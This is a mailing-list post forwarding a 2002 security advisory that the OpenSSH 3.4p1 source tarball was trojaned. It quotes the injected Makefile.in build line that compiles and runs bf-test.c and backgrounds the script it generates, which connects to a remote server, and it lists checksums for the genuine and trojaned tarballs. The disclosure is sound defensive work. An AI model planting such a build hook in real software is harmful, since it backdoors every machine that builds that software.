[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
openssh trojaned..
I don't know what this is worth, but freebsd-security had a post about
openssh being trojaned. You can check out the mail archive at
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
but its posted below for glancing...
-------------------------------------
FYI (I'm not on -security)
----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----
Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned
Greetings,
Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &
bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
Edwin
-------------------------------------------
like i said, don't know what it is worth, just thought everyone might want
to take a look. I dont follow freebsd-security, but it was pointed out to
me by a friend. It might be total bullshit. It might not.
-josh